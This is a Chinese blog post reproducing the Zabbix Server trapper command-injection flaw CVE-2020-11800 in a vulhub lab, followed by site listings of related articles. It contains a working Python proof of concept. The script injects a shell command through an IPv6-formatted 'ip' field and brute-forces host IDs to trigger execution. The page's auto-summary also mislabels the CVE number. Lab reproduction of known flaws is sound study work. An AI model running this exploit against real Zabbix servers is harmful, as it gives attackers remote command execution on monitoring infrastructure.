Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

最新推荐文章于 2024-07-09 19:39:05 发布
最新推荐文章于 2024-07-09 19:39:05 发布
阅读量1k 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 zabbix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119840734
版权
本文详细介绍了Zabbix监控系统在3.0.31之前的版本中存在的一处代码执行漏洞(CVE-2017-2824),该漏洞允许攻击者通过IPv6构造POC来绕过修复补丁,注入并执行任意命令。提供了漏洞复现的Python代码,当观察到特定结果时,表明命令执行成功。
摘要由CSDN通过智能技术生成

漏洞简介

Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix SIA zabbix3-proxy 3.0.31之前版本和zabbix3-server 3.0.31之前版本中存在安全漏洞。在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。

漏洞复现

修改CVE-2017-2824的POC中的IP字段,构造新的POC:

import sys
import socket
import json
import sys


def send(ip, data):
    conn = socket.create_connection((ip, 10051), 10)
    conn.send(json.dumps(data).encode())
    data = conn.recv(2048)
    conn.close()
    return data


target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):
    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
    if data and b'failed' not in data:
        print('hostid: %d' % i)
        print(data)

当查看到如下结果时,则说明命令执行成功:
在这里插入图片描述
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-11800 —— Zabbix 远程代码执行漏洞
战神/calmness的博客
12-10 897
目录 ​ Zabbix 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11800 | Zabbix 远程代码执行漏洞 Zabbix 组件介绍 Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级开源解决方案。Zabbix能监视各种网络参数,保证服务器系统的安全运营,并提供灵活的通知机制以便系统管理员快速定位和解决存在的各种问题。 它由两部分构成,Zabbix Server与可选组件Zabbix Agent。Zabbix server可以通过SNMP,Za
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
做自己喜欢的事,并将其发挥到极致!
06-30 1374
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。...
Zabbix Server trapper两个命令注入漏洞CVE-2017-2824和CVE-2020-11800
黑白的博客
05-02 2262
声明 好好学习,天天向上 CVE-2017-2824 漏洞描述 Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。 影响范围 Zabbix 2.4.7 - 2.4.8r1 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-m
Zabbix Sia Zabbix 逻辑漏洞CVE-2022-23134)
最新发布
Flag少侠的博客
07-09 9272
打开靶场打开是一个登录页面社工搜索默认用户名密码成功登录!!!这里复现环境太困难了,所以直接给出了 flag网上还有通过 RCE 命令获得 flag 的,这里给出的是通过题目要求复现的逻辑漏洞大佬链接t=N7T8大佬链接https://mp.weixin.qq.com/s/UiNEDrJ-3fPArtMLgeHvAQ。
zabbix监控深信服_Zabbix 远程代码执行漏洞CVE202011800
weixin_28899845的博客
12-06 488
漏洞概要 漏洞名称:Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级:高危影响范围:Zabbix 3.2 (已不支持)Zabbix 3.0 -3.0.30Zabbix 2.2.18 - 2.2.x(已不支持)漏洞类型:远程代码执行 漏洞分析 2.1 Zabbix 组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级开...
CVE-2020-11800Zabbix_Server_trapper_命令注入漏洞
weixin_40646615的博客
06-02 698
CVE-2020-11800Zabbix_Server_trapper_命令注入漏洞 20210508 一、漏洞简介 Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构,可用于监视各种网络服务、 服务器和网络机器等状态。在[CVE-2017-2824][1]中,其Servertrapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。 二、漏洞影响 Zabbix 3
Zabbix Server trapper命令注入漏洞CVE-2017-2824)
EC_Carrot的博客
08-21 1011
漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。远程攻击者可利用该漏洞注入命令,执行代码。 漏洞复现 使用这个简单的POC来复现漏洞: import sys import socket import json import sys def send(ip, da
CVE-2020-11800漏洞复现-kali2020.4
weixin_43867542的博客
07-19 902
漏洞名称:zabbix SIA Zabbix 安全漏洞 等级危害:超危 CVSS评分: 漏洞类型:其他 漏洞概述 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix SIA zabbix3-proxy 3.0.31之前版本和zabbix3-server 3.0.31之前版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码/命令。 受影响版本 zabbix 3.0.x~3.0.30 环境概
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
zabbix-server-mysql-4.0.4-1.1.x86_64.rpm
03-19
zabbix-server-mysql-4.0.4-1.1.x86_64.rpm离线安装包,centos7的,
zabbix_agent-6.0.3-windows-i386-openssl
05-05
Zabbix Agent是Zabbix监控系统的核心组件之一,主要用于收集被监控服务器或设备的各项性能数据,如CPU利用率、内存使用情况、磁盘空间等,并将这些信息发送到Zabbix Server进行分析和展示。在Windows平台上,6.0.3...
Zabbix 远程代码执行漏洞CVE-2020-11800)复现
玄道的网安博客
01-14 5185
简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 漏洞概述 Zabbix Servertrapper命令处理,存在命令注入漏洞,可导致远程代码执行。 影响版本 Zabbix 3.0.x~3.0.30 环境搭建 项目地址 https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2020-11800 ...
Zabbix 远程代码执行漏洞复现(CVE-2020-11800
m0_48520508的博客
03-08 5460
0x00简介 abbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,A
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
HengMengSec的博客
08-21 2156
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
请求zabbix_【更新】Zabbix 远程代码执行漏洞CVE202011800
weixin_36251052的博客
01-16 396
漏洞名称 :Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级 : 高危影响范围: Zabbix 2.2.18 -2.2.23Zabbix 3.0 -3.0.30 Zabbix3.2-3.2.11漏洞类型 :远程代码执行利用难度 : 高 漏洞分析 1组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级...
远程反序列化rce漏洞_漏洞预警|WebLogic 反序列化远程命令执行 (CNVDC201948814)
weixin_31830691的博客
01-15 229
WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器。 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了Oracle WebLogic wl...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值